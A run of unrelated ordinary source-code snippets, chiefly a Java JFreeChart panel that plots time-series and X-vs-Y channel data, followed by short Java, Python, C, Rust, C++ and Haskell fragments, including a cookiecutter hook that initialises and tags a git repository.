xChannelIndex = channels.indexOf(xChannel); String yChannelName = yChannel.getName(); if (yChannel.getUnit() != null) { yChannelName += " (" + yChannel.getUnit() + ")"; } int yChannelIndex = channels.indexOf(yChannel); String seriesName = xChannelName + " vs. " + yChannelName; XYTimeSeries data = new XYTimeSeries(seriesName, FixedMillisecond.class); try { NumericDataSample sample; while ((sample = reader.readSample()) != null) { double timestamp = sample.getTimestamp(); Number[] values = sample.getValues(); FixedMillisecond time = new FixedMillisecond((long)(timestamp*1000)); XYTimeSeriesDataItem dataItem = new XYTimeSeriesDataItem(time); if (values[xChannelIndex] != null && values[yChannelIndex] != null) { dataItem.setX(values[xChannelIndex]); dataItem.setY(values[yChannelIndex]); } data.add(dataItem, false); } } catch (Exception e) { e.printStackTrace(); return; } Color color = getLeastUsedColor(); colors.put(seriesName, color); ((XYTimeSeriesCollection)dataCollection).addSeries(data); localSeries++; setSeriesColors(); updateTitle(); updateLegend(); } /** * Remove the local series from the chart. * * @param seriesName the name of the local series. */ private void removeLocalSeries(String seriesName) { XYTimeSeries series = ((XYTimeSeriesCollection)dataCollection).getSeries(seriesName); if (series == null) { return; } localSeries--; ((XYTimeSeriesCollection)dataCollection).removeSeries(series); colors.remove(seriesName); setSeriesColors(); updateTitle(); updateLegend(); } /** * Called when the bounds of an axis are changed. This updates the data panel * properties for these values. */ private void boundsChanged() { if (xyMode) { if (domainAxis.isAutoRange()) { properties.remove("domainLowerBound"); properties.remove("domainUpperBound"); } else { log.debug("setting domain bound to lower:"+domainAxis.getLowerBound()+ " upper:"+ domainAxis.getUpperBound()); properties.setProperty("domainLowerBound", Double.toString(domainAxis.getLowerBound())); properties.setProperty("domainUpperBound", Double.toString(domainAxis.getUpperBound())); } } if (rangeAxis.isAutoRange()) { log.debug("range is auto - lower:"+rangeAxis.getLowerBound()+ " upper:"+ rangeAxis.getUpperBound()); properties.remove("rangeLowerBound"); properties.remove("rangeUpperBound"); } else { log.debug("setting range bound to lower:"+rangeAxis.getLowerBound()+ " upper:"+ rangeAxis.getUpperBound()); properties.setProperty("rangeLowerBound", Double.toString(rangeAxis.getLowerBound())); properties.setProperty("rangeUpperBound", Double.toString(rangeAxis.getUpperBound())); } } /** * Indicates that this data panel can support multiple channels. This always * returns true. * * @return always true */ public boolean supportsMultipleChannels() { return true; } protected VisualizationSeries getSeriesForChannel(String channelName){ if (xyMode) { return new XYChannelSeries(channelName); }else{ return super.getSeriesForChannel(channelName); } } protected void onSeriesAdded(VisualizationSeries vs){ // String channelDisplay = getChannelDisplay(channelName); // String seriesName = null; Color color = getLeastUsedColor(); if (xyMode) { // Iterator<String> chanIt = vs.getChannels().iterator(); // String firstChannelName = (String)chanIt.next(); // String firstChannelDisplay = getChannelDisplay(firstChannelName); // seriesName = firstChannelDisplay + " vs. " + channelDisplay; // //color = getLeastUsedColor(); XYTimeSeries data = new XYTimeSeries(vs.getName(), FixedMillisecond.class); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); int position = dataCollection.getSeriesCount() - localSeries; ((XYTimeSeriesCollection)dataCollection).addSeries(position, data); } else { //seriesName = channelDisplay; FastTimeSeries data = new FastTimeSeries(vs.getName(), FixedMillisecond.class); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); ((TimeSeriesCollection)dataCollection).addSeries(data); } // find the least used color and set it colors.put(vs.getName(), color); setSeriesColors(); updateLegend(); System.out.println("adding series "+vs.getName()); } /** * Called when a channel has been added. * * @param channelName the new channel */ // protected void channelAdded(String channelName) { // // updateTitle(); // // } /** * Update legend and color allocations. * @param vs the series that was removed. */ protected void onSeriesRemoved(VisualizationSeries vs) { setSeriesColors(); //updateTitle(); updateLegend(); } /** * Return a color that is least used. * * @return the color */ private Color getLeastUsedColor() { int usage = -1; Color color = null; for (int i=0; i<seriesColors.length; i++) { int seriesUsingColor = getSeriesUsingColor(seriesColors[i]); if (usage == -1 || seriesUsingColor < usage) { usage = seriesUsingColor; color = seriesColors[i]; } } return color; } /** * Count the number of series using the specified color for their series * plot. * * @param color the color to find * @return the number of series using this color */ private int getSeriesUsingColor(Color color) { if (color == null) { return 0; } int count = 0; for (int i=0; i<dataCollection.getSeriesCount(); i++) { Paint p = xyPlot.getRenderer().getSeriesPaint(i); if (p.equals(color)) { count++; } } return count; } /** * Set the color for all the series. */ private void setSeriesColors() { for (int i=0; i<dataCollection.getSeriesCount(); i++) { String series = (String)dataCollection.getSeriesKey(i); xyPlot.getRenderer().setSeriesPaint(i, colors.get(series)); } } /** * Set local time scale. */ protected void setLocalTimescale(double timeScale) { super.setLocalTimescale(timeScale); ageDataOnTimeScaleChange(); } /** * Shows or hides the legend. * * @param showLegend if true, the legend will show, otherwise it will not */ private void setShowLegend(boolean showLegend) { if (this.showLegend == showLegend) { return; } this.showLegend = showLegend; //showLegendMenuItem.setSelected(showLegend); if (showLegend) { properties.remove(DATA_PANEL_PROPERTY_SHOW_LEGEND); } else { properties.setProperty(DATA_PANEL_PROPERTY_SHOW_LEGEND, "false"); } updateLegend(); } /** * Update the legend and axis labels based on the series being viewed. */ private void updateLegend() { int series = dataCollection.getSeriesCount(); //int chans = channels.size(); VisualizationSeries firstSeries = null; if(seriesList_.size()>0){ firstSeries = seriesList_.get(0); } if (xyMode) { if(firstSeries==null){ domainAxis.setLabel(null); rangeAxis.setLabel(null); }else{ String channelDisplay = getChannelDisplay(firstSeries.getChannels().get(0)); domainAxis.setLabel(channelDisplay); if(firstSeries.getChannels().size()>1){ String channel2 = firstSeries.getChannels().get(1); rangeAxis.setLabel(getChannelDisplay(channel2)); }else{ rangeAxis.setLabel(null); } } // if (series == 0 && chans == 1) { // String channelDisplay = getChannelDisplay((String)channels.get(0)); // domainAxis.setLabel(channelDisplay); // rangeAxis.setLabel(null); // } else if (series == 1 && chans == 0) { // XYTimeSeries xySeries = ((XYTimeSeriesCollection)dataCollection).getSeries(0); // String seriesName = (String)xySeries.getKey(); // String[] channelNames = seriesName.split(" vs. "); // if (channelNames.length == 2) { // domainAxis.setLabel(channelNames[0]); // rangeAxis.setLabel(channelNames[1]); // } // } else if (series == 1 && chans == 2) { // String channelDisplay1 = getChannelDisplay((String)channels.get(0)); // domainAxis.setLabel(channelDisplay1); // String channelDisplay2 = getChannelDisplay((String)channels.get(1)); // rangeAxis.setLabel(channelDisplay2); // } } else { if(firstSeries==null){ rangeAxis.setLabel(null); }else{ String channelDisplay = getChannelDisplay(firstSeries.getChannels().get(0)); rangeAxis.setLabel(channelDisplay); } } // show the legend if it is enabled and there are at least 2 series if (showLegend && series >= 2) { if (chart.getLegend() == null) { chart.addLegend(seriesLegend); } } else { if (chart.getLegend() != null) { seriesLegend = chart.getLegend(); } chart.removeLegend(); } } // @Override // public VizSeriesList getSeries(){ // // if (xyMode) { // VizSeriesList ret = new VizSeriesList(); // Iterator<String> i = channels.iterator(); // while (i.hasNext()) { // String firstChannel = i.next(); // if (i.hasNext()) { // String secondChannel = i.next(); // List<String> channels=new ArrayList<String>(); // channels.add(firstChannel); // channels.add(secondChannel); // ChannelSeries newSeries=new ChannelSeries(channels, new XYSeriesFormatter()); // ret.add(newSeries); // }else{ // ChannelSeries newSeries=new ChannelSeries(firstChannel, new XYSeriesFormatter()); // ret.add(newSeries); // } // } // // // add opaque series with just name placeholder??? // int remoteSeries = dataCollection.getSeriesCount()-localSeries; // for (int j=remoteSeries; j<remoteSeries+localSeries; j++) { // String seriesName = (String)dataCollection.getSeriesKey(j); // new ChartLocalSeries(seriesName); // } // return ret; // }else{ // return super.getSeries(); // } // } @Override public boolean removeSeries(String seriesName){ boolean ret=true; VizSeriesList slist = getSeries(); for(int i=0;i<slist.size();i++){ VisualizationSeries series=slist.get(i); if(series.getName().compareToIgnoreCase(seriesName)==0){ if(series instanceof ChartLocalSeries){ removeLocalSeries(series.getName()); }else{ if (xyMode) { XYTimeSeriesCollection dataCollection = (XYTimeSeriesCollection)this.dataCollection; XYTimeSeries data = dataCollection.getSeries(series.getName()); dataCollection.removeSeries(data); colors.remove(series.getName()); ret= super.removeSeries(series); } else { TimeSeriesCollection dataCollection = (TimeSeriesCollection)this.dataCollection; TimeSeries data = dataCollection.getSeries(series.getName()); if(data!=null){ dataCollection.removeSeries(data); } colors.remove(series.getName()); ret= super.removeSeries(series); } } } } setSeriesColors(); updateTitle(); updateLegend(); return ret; } /** * Get the string for this channel to display in the UI. This will show the * channel units if there are any. * * @param channelName the name of the channel * @return the string to display the channel in the UI */ private String getChannelDisplay(String channelName) { String seriesName = channelName; Channel channel = RBNBController.getInstance().getChannel(channelName); if (channel != null) { String unit = channel.getUnit(); if (unit != null) { seriesName += " (" + unit + ")"; } } return seriesName; } /** * Called when the global time scale changes. This updates the maximum age of the * dataset. * * @param newTimeScale the new time scale */ public void globalTimeScaleChanged(double timeScale) { super.globalTimeScaleChanged(timeScale); if(localTimeScale_==TimeScale.TIME_SCALE_UNDEFINED){ ageDataOnTimeScaleChange(); } } private void ageDataOnTimeScaleChange(){ SwingUtilities.invokeLater(new Runnable() { final double localScale = localTimeScale_; public void run() { // /* update UI to reflect changing timescale */ // Enumeration<AbstractButton> iter = timeRangeGroup.getElements(); // while (timeRangeGroup.getElements().hasMoreElements()) { // AbstractButton b = iter.nextElement(); // double btnValue = Double.parseDouble(b.getActionCommand()); // if(localScale==btnValue){ // timeRangeGroup.setSelected(b.getModel(), true); // break; // } // } int series = dataCollection.getSeriesCount(); if (xyMode) { series -= localSeries; } for (int i=0; i<series; i++) { if (xyMode) { XYTimeSeriesCollection xyTimeSeriesCollection = (XYTimeSeriesCollection)dataCollection; XYTimeSeries data = xyTimeSeriesCollection.getSeries(i); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); } else { TimeSeriesCollection timeSeriesCollection = (TimeSeriesCollection)dataCollection; FastTimeSeries data = (FastTimeSeries)timeSeriesCollection.getSeries(i); data.setMaximumItemAge((long)(timeScale*1000), (long)(time*1000)); } } if (!xyMode) { domainAxis.setRange((time-timeScale)*1000, time*1000); ((FixedAutoAdjustRangeDateAxis)domainAxis).setAutoAdjustRange((time-timeScale)*1000, time*1000); } } }); } /** * Posts new data to the data panel. * * @param channelMap the channel map with the new data */ public void postData(final SubscriptionResponse r){ if(r==null) return; final double now =RBNBController.getInstance().getLocation(); this.time=now; lastDataPostSysTime=System.currentTimeMillis(); Runnable run = new Runnable() { //private double time=ChartViz.this.time; private SubscriptionResponse resp=r; //SubscriptionResponse resp=r; public void run() { //ChartViz.this.subResponse_=resp; if(r.containsHistory()){ //log.debug("received "+DataViewer.formatDate(time)+" before "+DataViewer.formatDate(this.time)); clearData(); } // must set time axis before adding data to ensure // auto ranging is properly calculated setTimeAxis(now); if (xyMode) { postDataXY(resp); } else { postDataTimeSeries(resp); } //resp.getTimeSeries().free(ChartViz.this); //if(resp.freeResult(ChartViz.this)){ //ChartViz.this.subResponse_=null; //} } }; SwingUtilities.invokeLater(run); } /** * Posts the data in the channel map when in time series mode. * * @param resp the response with the new data */ private void postDataTimeSeries(SubscriptionResponse resp) { postDataCount=0L; postDataStartTime=Double.MAX_VALUE; postDataEndTime=0.0; long startTimeMillis=System.currentTimeMillis(); chart.setNotify(false); VizSeriesList vsl = getSeries(); //loop over all channels and see if there is data for them for (VisualizationSeries s : vsl) { TimeSeriesData tsd = resp.getTimeSeries(s); if (tsd == null) continue; //if there is data for channel, post it //if(tsd.hasChannel(channelName)){ postDataTimeSeries(tsd, s); //} } log.debug("copied "+postDataCount+" series recs from: " +RBNBTime.formatISO(postDataStartTime)+" to: " +RBNBTime.formatISO(postDataEndTime)+" in " +(System.currentTimeMillis()-startTimeMillis) +" ms"); startTimeMillis=System.currentTimeMillis(); chart.setNotify(true); chart.fireChartChanged(); // always return 0 //log.info("rendered plot in " // +(System.currentTimeMillis()-startTimeMillis) // +" ms"); } /** * Posts the data in the channel map to the specified channel when in time * series mode. * * @param channelMap the channel map containing the new data * @param channelName the name of the channel to post data to */ private void postDataTimeSeries(TimeSeriesData tsd, VisualizationSeries s) { String channelName = s.getChannels().get(0); if(!tsd.hasChannel(channelName)) return; TimeSeriesCollection dataCollection = (TimeSeriesCollection)this.dataCollection; FastTimeSeries timeSeriesData = (FastTimeSeries)dataCollection.getSeries(channelName); if (timeSeriesData == null) { log.warn("No chartviz data series with channel name "+channelName); return; } //TimeSeriesData respTs=resp.getTimeSeries(); try { //double[] times = channelMap.GetTimes(channelIndex); int channelIndex=tsd.getChannelIndex(channelName); if(channelIndex<0){ //log.debug("time series got null iterator for channel "+channelName); }else{ List<Double> times=tsd.getTimes(channelIndex); Iterator<Double>it=times.iterator(); int typeID = tsd.getType(channelIndex); //chart.setNotify(false); timeSeriesData.startAdd(times.size()); while (it.hasNext()){ Double newTime=it.next(); RBNBTime recTime=new RBNBTime(newTime); FixedMillisecond time = new FixedMillisecond(recTime.getMillis()); switch (typeID) { case ChannelMap.TYPE_FLOAT64: timeSeriesData.add(time, tsd.getDataAsFloat64(channelIndex,newTime)); break; case ChannelMap.TYPE_FLOAT32: timeSeriesData.add(time, tsd.getDataAsFloat32(channelIndex,newTime)); break; case ChannelMap.TYPE_INT64: timeSeriesData.add(time, tsd.getDataAsInt64(channelIndex,newTime)); break; case ChannelMap.TYPE_INT32: timeSeriesData.add(time, tsd.getDataAsInt32(channelIndex,newTime)); break; case ChannelMap.TYPE_INT16: timeSeriesData.add(time, tsd.getDataAsInt16(channelIndex,newTime)); break; case ChannelMap.TYPE_INT8: timeSeriesData.add(time, tsd.getDataAsInt8(channelIndex,newTime)); break; case ChannelMap.TYPE_STRING: case ChannelMap.TYPE_UNKNOWN: case ChannelMap.TYPE_BYTEARRAY: log.error("Got byte array type for channel " + channelName + ". Don't know how to handle."); break; } ++postDataCount; } if(times.size()>0){ if(times.get(0)<postDataStartTime) postDataStartTime=times.get(0); if(times.get(times.size()-1)>postDataEndTime) postDataEndTime=times.get(times.size()-1); } } timeSeriesData.fireSeriesChanged(); //chart.setNotify(true); //chart.fireChartChanged(); } catch (Exception e) { log.error("Problem plotting data for channel " + channelName + "."); e.printStackTrace(); } } /** * Posts a new time with no data. Updates time scale of graph if * no data has been posted to this chart within the fixed timeout. * This was added for the case where we are monitoring data and * only receiving from some sources. Plots dependent on sources * not providing data should still adjust to show time passing. * * @param time the new time */ public void postTime(double time) { if ((time>this.time) && (System.currentTimeMillis()-lastDataPostSysTime) >(ADJUST_TIME_SCALE_TIMEOUT_SEC*1000.0)){ log.debug("adjusting chart axis on postTime()"); super.postTime(time); final double myTime = time; SwingUtilities.invokeLater(new Runnable() { public void run(){ setTimeAxis(myTime); } }); } } /** * Posts the data in the channel map when in x vs. y mode. * * @param resp new data response * @param cachedChannelMap the cached channel map */ private void postDataXY(SubscriptionResponse resp) { postDataCount=0L; postDataStartTime=Double.MAX_VALUE; postDataEndTime=0.0; VizSeriesList vsl = getSeries(); long startTimeMillis=System.currentTimeMillis(); chart.setNotify(false); for (int i=0;i<vsl.size();i++){ VisualizationSeries s=vsl.get(i); postDataXY(resp.getTimeSeries(s),s,i); } // //loop over all channels and see if there is data for them // int seriesCount = dataCollection.getSeriesCount()-localSeries; // // chart.setNotify(false); // // for (int i=0; i<seriesCount; i++) { // postDataXY(resp, i); // } log.debug("copied "+postDataCount+" xy recs from: " +RBNBTime.formatISO(postDataStartTime)+" to: " +RBNBTime.formatISO(postDataEndTime)+" in " +(System.currentTimeMillis()-startTimeMillis) +" ms"); startTimeMillis=System.currentTimeMillis(); chart.setNotify(true); //xySeriesData.fireSeriesChanged(); chart.fireChartChanged(); //lastTimeDisplayed = time; // always returns 0 //log.info("rendered plot in " // +(System.currentTimeMillis()-startTimeMillis) // +" ms"); } /** * Posts the data in the channel map to the specified channel when in x vs. y * mode. * * @param tsd new data response * @param series data series * @param seriesIndex the index of the series */ private void postDataXY(TimeSeriesData tsd, VisualizationSeries series, int seriesIndex) { if (!xyMode) { log.error("Tried to post X vs. Y data when not in xy mode."); return; } // if (resp == null) { // log.debug("postXY channel map null"); // //no data to display yet // return; // } // TimeSeriesData tsData=resp.getTimeSeries(); if (tsd==null || !tsd.hasData()) { log.debug("postXY no data to graph"); //no data to display yet return; } //System.out.print("series:"+series+", chans:"); //for(String chanName: channels){ // System.out.print(chanName+","); //} //log.debug(); // not enuff channels in series yet if(series.getChannels().size()<2) return; //Object[] channelsArray = channels.toArray(); String xChannelName = series.getChannels().get(0);//(String)channelsArray[series*2]; String yChannelName = series.getChannels().get(1);//(String)channelsArray[series*2+1]; //get the channel indexes for the x and y channels int xChannelIndex = tsd.getChannelIndex(xChannelName); int yChannelIndex = tsd.getChannelIndex(yChannelName); if(xChannelIndex<0 || yChannelIndex<0) { log.warn("postXY channels not found in time series - post data cancelled"); return; } List<Double> xTimes=tsd.getTimes(xChannelIndex); List<Double> yTimes=tsd.getTimes(yChannelIndex); if(xTimes.size()==0 || yTimes.size()==0){ log.warn("postXY channels have no time series data - post data cancelled"); return; } boolean xIsDriver=false; List<Double> driverTimes; if(xTimes.size()<yTimes.size()){ driverTimes=xTimes; xIsDriver=true; }else{ driverTimes=yTimes; } try { //log.debug("postXY graphing from "+DataViewer.formatDateSmart(dataStartTime)+" to "+DataViewer.formatDateSmart(times[endIndex])); XYTimeSeriesCollection dataCollection = (XYTimeSeriesCollection)this.dataCollection; XYTimeSeries xySeriesData = (XYTimeSeries)dataCollection.getSeries(seriesIndex); int yTypeID = tsd.getType(yChannelIndex); int xTypeID = tsd.getType(xChannelIndex); //chart.setNotify(false); // if(tsd.size(yChannelIndex) != tsd.size(xChannelIndex)){ // log.warn("xy chart data size mismatch!"); // } log.debug("start graphing "+(tsd.size(yChannelIndex)+" points on series "+series)); xySeriesData.startAdd(driverTimes.size()); //List<Double> yTimes=tsd.getTimes(yChannelIndex); Iterator<Double> drvTimeIt=driverTimes.iterator(); while (drvTimeIt.hasNext()){ Double drvTime=drvTimeIt.next(); //TimeSeriesRecord xRec=xIt.next(); //if(xRec.getTime()!=yRec.getTime()){ // log.warn("xy plot time out of sync!"); //} Double xTime,yTime; if(xIsDriver){ xTime=drvTime; yTime=tsd.getTimeNearest(yChannelIndex,xTime); }else{ yTime=drvTime; xTime=tsd.getTimeNearest(xChannelIndex,yTime); } //log.info("xt: "+DataViewer.formatDate(xTime)+", yt: "+DataViewer.formatDate(yTime)); if(xTime==null || yTime==null){ log.warn("postXY no time for one or more channels"); continue; } RBNBTime rbnbTime=new RBNBTime(drvTime); FixedMillisecond time=new FixedMillisecond(rbnbTime.getMillis()); Number xData=null,yData=null; switch (xTypeID) { case ChannelMap.TYPE_FLOAT64: xData = tsd.getDataAsFloat64(xChannelIndex,xTime); break; case ChannelMap.TYPE_FLOAT32: xData = tsd.getDataAsFloat32(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT64: xData = tsd.getDataAsInt64(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT32: xData = tsd.getDataAsInt32(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT16: xData = tsd.getDataAsInt16(xChannelIndex,xTime); break; case ChannelMap.TYPE_INT8: xData = tsd.getDataAsInt8(xChannelIndex,xTime); break; case ChannelMap.TYPE_BYTEARRAY: case ChannelMap.TYPE_STRING: case ChannelMap.TYPE_UNKNOWN: log.error("Don't know how to handle data type for " + xChannelName + "."); break; } switch (yTypeID) { case ChannelMap.TYPE_FLOAT64: yData = tsd.getDataAsFloat64(yChannelIndex,yTime); break; case ChannelMap.TYPE_FLOAT32: yData = tsd.getDataAsFloat32(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT64: yData = tsd.getDataAsInt64(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT32: yData = tsd.getDataAsInt32(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT16: yData = tsd.getDataAsInt16(yChannelIndex,yTime); break; case ChannelMap.TYPE_INT8: yData = tsd.getDataAsInt8(yChannelIndex,yTime); break; case ChannelMap.TYPE_BYTEARRAY: case ChannelMap.TYPE_STRING: case ChannelMap.TYPE_UNKNOWN: log.error("Don't know how to handle data type for " + yChannelName + "."); break; } //FIXME null is not a valid return value for the getData methods now // need some way to verify both data channels have data at same time // and perhaps provide a way to match closest data point if they don't if(xData!=null && yData !=null){ xySeriesData.add(time, xData, yData, false); ++postDataCount; }else{ log.warn("data not synced for plot x: "+xChannelName+" y: "+yChannelName+" at:"+rbnbTime.formatISO()); } } xySeriesData.fireSeriesChanged(); // // chart.setNotify(true); // //xySeriesData.fireSeriesChanged(); // chart.fireChartChanged(); if(driverTimes.size()>0){ if(driverTimes.get(0)<postDataStartTime) postDataStartTime=driverTimes.get(0); if(driverTimes.get(driverTimes.size()-1)>postDataEndTime) postDataEndTime=driverTimes.get(driverTimes.size()-1); } // if(driverTimes.size()>0){ // log.debug("xy chart graphed "+driverTimes.size()+" recs between "+ // RBNBTime.formatISO(driverTimes.get(0))+" and "+ // RBNBTime.formatISO(driverTimes.get(driverTimes.size()-1))); // }else{ // log.warn("xy chart graphed 0 recs"); // } } catch (Exception e) { log.error("Problem plotting data for channels " + xChannelName + " and " + yChannelName + "."); e.printStackTrace(); } } /** * Sets the time axis to display within the current time and time scale. This * assumes it is called in the event dispatch thread. */ private void setTimeAxis(double end) { if (chart == null) { log.warn("Chart object is null. This shouldn't happen."); return; } //Object[] channelsArray = channels.toArray(); RBNBTime endTime=new RBNBTime(end); RBNBTime startTime=new RBNBTime(end-timeScale); //log.debug("time axis start: "+startTime.formatISO()+" end:"+endTime.formatISO()); int series = dataCollection.getSeriesCount(); if (xyMode) { series -= localSeries; } for (int i=0; i<series; i++) { // //FIXME access to channelsArray causes an array index error on AWT thread // String xChannelName = (String)channelsArray[i*2]; // String yChannelName = (String)channelsArray[i*2+1]; // int xIndex=resp.getTimeSeries().getChannelIndex(xChannelName); // int yIndex=resp.getTimeSeries().getChannelIndex(yChannelName); // //RBNBTime maxLast=new RBNBTime(Math.max(resp.getTimeSeries().getEndTime(xIndex), // resp.getTimeSeries().getEndTime(yIndex))); if (xyMode) { XYTimeSeriesCollection xyTimeSeriesDataCollection = (XYTimeSeriesCollection)dataCollection; XYTimeSeries data = xyTimeSeriesDataCollection.getSeries(i); //log.debug("aging graph items at "+endTime.formatISO()); data.removeAgedItems(endTime.getMillis()); } else { TimeSeriesCollection timeSeriesDataCollection = (TimeSeriesCollection)dataCollection; TimeSeries data = timeSeriesDataCollection.getSeries(i); //log.debug("aging graph items at "+endTime.formatISO()); data.removeAgedItems(endTime.getMillis(), true); } } if (!xyMode) { domainAxis.setRange(startTime.getMillis(), endTime.getMillis()); ((FixedAutoAdjustRangeDateAxis)domainAxis).setAutoAdjustRange(startTime.getMillis(), endTime.getMillis()); } } /** * Sets the time axis to display within the current time and time scale. This * assumes it is called in the event dispatch thread. */ // private void setTimeAxis(SubscriptionResponse resp) { // // TimeSeriesData tsd=resp.getTimeSeries(); // if(!tsd.hasData())return; // setTimeAxis(tsd.getMaxEndTime()); // } /** * Removes all data from all the series. */ void clearData() { if (chart == null) return; //lastTimeDisplayed = -1; int series = dataCollection.getSeriesCount(); if (xyMode) { series -= localSeries; } for (int i=0; i<series; i++) { if (xyMode) { XYTimeSeriesCollection xyTimeSeriesDataCollection = (XYTimeSeriesCollection)dataCollection; XYTimeSeries data = xyTimeSeriesDataCollection.getSeries(i); data.clear(); } else { TimeSeriesCollection timeSeriesDataCollection = (TimeSeriesCollection)dataCollection; TimeSeries data = timeSeriesDataCollection.getSeries(i); data.clear(); } } log.info("Cleared data display."); } /** * Sets properties for the data panel. * * @param key the key for the property * @param value the value for the property */ public void setProperty(String key, String value) { super.setProperty(key, value); if (key != null && value != null) { if (key.equals("domainLowerBound")) { domainAxis.setLowerBound(Double.parseDouble(value)); } else if (key.equals("domainUpperBound")) { domainAxis.setUpperBound(Double.parseDouble(value)); } else if (key.equals("rangeLowerBound")) { log.debug("setting range lower bound: "+value); rangeAxis.setLowerBound(Double.parseDouble(value)); } else if (key.equals("rangeUpperBound")) { log.debug("setting range upper bound: "+value); rangeAxis.setUpperBound(Double.parseDouble(value)); } else if (key.equals(DATA_PANEL_PROPERTY_SHOW_LEGEND) && !Boolean.parseBoolean(value)) { setShowLegend(false); } } } /** * Get the name of this data panel. */ public String toString() { return "JFreeChart Data Panel"; } }
package org.sonar.plugins.text.checks; import java.io.File; import java.io.IOException; import java.nio.charset.Charset; import java.nio.charset.StandardCharsets; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import org.apache.commons.io.FileUtils; import org.junit.BeforeClass; import org.junit.rules.TemporaryFolder; import org.junit.runner.RunWith; import org.mockito.runners.MockitoJUnitRunner; import org.sonar.api.batch.fs.internal.DefaultFileSystem; import org.sonar.api.batch.fs.internal.TestInputFileBuilder; @RunWith(MockitoJUnitRunner.class) public abstract class AbstractCheckTester { private static final Path tempfilesLocation = Paths.get("target", "surefire-test-resources"); @BeforeClass public static void init() throws IOException { Files.createDirectories(tempfilesLocation); } @org.junit.Rule public TemporaryFolder temporaryFolder = new TemporaryFolder(tempfilesLocation.toFile()); protected static final String INCORRECT_NUMBER_OF_VIOLATIONS = "Incorrect number of violations"; protected TextSourceFile parseAndCheck(final File file, final AbstractTextCheck check, final String projectKey) { TextSourceFile textSourceFile = new TextSourceFile(new TestInputFileBuilder(".", file.getPath()).build()); check.validate(textSourceFile, projectKey); return textSourceFile; } protected DefaultFileSystem createFileSystem() throws IOException { File workDir = temporaryFolder.getRoot(); Files.createDirectories(workDir.toPath()); DefaultFileSystem fs = new DefaultFileSystem(workDir); fs.setEncoding(Charset.defaultCharset()); return fs; } protected File createTempFile(final String content) throws IOException { File f = temporaryFolder.newFile("file.xml"); FileUtils.write(f, content, StandardCharsets.UTF_8); return f; } }
def f(df, C): geneNames = [] corrs = [] pvalues = [] for k, (geneName, row) in enumerate(df.iterrows()): myRankedExpr = row.sort_values() myRankedExpr = np.log10(myRankedExpr + 1) myY = myRankedExpr / max(myRankedExpr) corr, pvalue = scipy.stats.pearsonr(myY, C) geneNames.append(geneName) corrs.append(corr) pvalues.append(pvalue) df_corrs = pd.DataFrame({"geneName":geneNames, "corr":corrs, "pvalue":pvalues}) return df_corrs
/* hc_convert_to_short -- Convert a set of skiplists to a simple linked list. */ static void hc_convert_to_short (HistoryCache_t *hcp) { Skiplist_t *handles = hcp->hc_handles; sl_free (hcp->hc_hashes); hcp->hc_inst_head = hcp->hc_inst_tail = NULL; sl_walk (handles, hc_cvt_fct, hcp); sl_free (handles); hcp->hc_skiplists = 0; }
<reponame>marksauter/musicode<filename>tests/interval_set.rs use musicode::IntervalSet; #[test] fn test_simple() { let mut set: IntervalSet = IntervalSet::new(); assert_eq!(set.insert(5), (0, true)); assert_eq!(set.insert(3), (0, true)); assert_eq!(set.insert(4), (1, true)); assert_eq!(set.insert(4), (1, false)); assert_eq!(set.find_or_insert(4), Ok(1)); assert_eq!(set.len(), 3); assert_eq!(set.binary_search(&3), Ok(0)); }
def split(self, jobs=None): if jobs is None: jobs = self.top.size (next, sub) = self.top.split(jobs) with self.pushed(sub): yield next
def git_init_and_tag(): directory_status = invoke_shell("git status", expected_error=True, print_output=False) if 'fatal' in directory_status: invoke_shell("git init") invoke_shell("git add .") invoke_shell( "git commit -m \"Initial commit after CMS Cookiecutter creation, version {}\"".format( '{{ cookiecutter._cms_cc_version }}')) version = invoke_shell("git tag", expected_error=True) if not version: invoke_shell("git tag 0.0.0") else: print("\ngit repository detected. CookieCutter files have been created in {{ cookiecutter.repo_name }} directory.")
/** Get locations for all outputs with automatic_location * * @param program Program object * @param program_interface Interface of program **/ void TextureTestBase::prepareFragmentDataLoc(Utils::Program& program, Utils::ProgramInterface& program_interface) { Utils::ShaderInterface& si = program_interface.GetShaderInterface(Utils::Shader::FRAGMENT); Utils::Variable::PtrVector& outputs = si.m_outputs; for (Utils::Variable::PtrVector::iterator it = outputs.begin(); outputs.end() != it; ++it) { if (Utils::Variable::m_automatic_location == (*it)->m_descriptor.m_expected_location) { GLuint index = program.GetResourceIndex((*it)->m_descriptor.m_name, GL_PROGRAM_OUTPUT); GLint location = 0; program.GetResource(GL_PROGRAM_OUTPUT, index, GL_LOCATION, 1 , &location); (*it)->m_descriptor.m_expected_location = location; } } }
{-# OPTIONS_GHC -fglasgow-exts -fcontext-stack=30 #-} module Blog.Views where -- View functions and logic. The actual HTML is found in Templates, -- which has pure functions that generally return Html. import Blog.DB (connect) import Blog.Feeds import Blog.Formats (Format(..), getFormatter) import Blog.Forms import Blog.Globals (mkCsrfField) import Blog.Links import Blog.Model import Blog.Templates import Ella.Framework (default404, View) import Ella.GenUtils (utf8, with, exactParse, getTimestamp) import Ella.Param (captureOrDefault, capture) import Ella.Request import Ella.Response import Ella.Utils (addHtml) import Maybe (fromMaybe, isJust, fromJust, catMaybes) import Network.CGI.Protocol (formEncode, urlEncode) import System.Time (ClockTime(..), toUTCTime) import Text.Atom.Feed (Feed) import Text.Atom.Feed.Export (xmlFeed) import Text.StringTemplate import Text.StringTemplate.GenericStandard import Text.XML.Light (showTopElement) import qualified Blog.Category as Ct import qualified Blog.Links as Links import qualified Blog.Post as P import qualified Blog.Settings as Settings import qualified Data.Map as Map import qualified Data.ByteString.Lazy.Char8 as LB import qualified Data.Text.Lazy as LT import qualified Data.Text.Lazy.Encoding as LT import qualified Text.XHtml as X ---- Utilities -- | Generate a standard response, given the HTML to add. standardResponse html = buildResponse [ addHtml html ] utf8HtmlResponse standardResponseBS :: LB.ByteString -> Response standardResponseBS content = buildResponse [ addContent content ] utf8HtmlResponse -- | Standard response, taking a Request and StringTemplate Text as input standardResponseTT :: Request -> StringTemplate LB.ByteString -> Response standardResponseTT req template = let csrffield = mkCsrfField req t2 = setAttribute "csrffield" csrffield template qs = formEncode 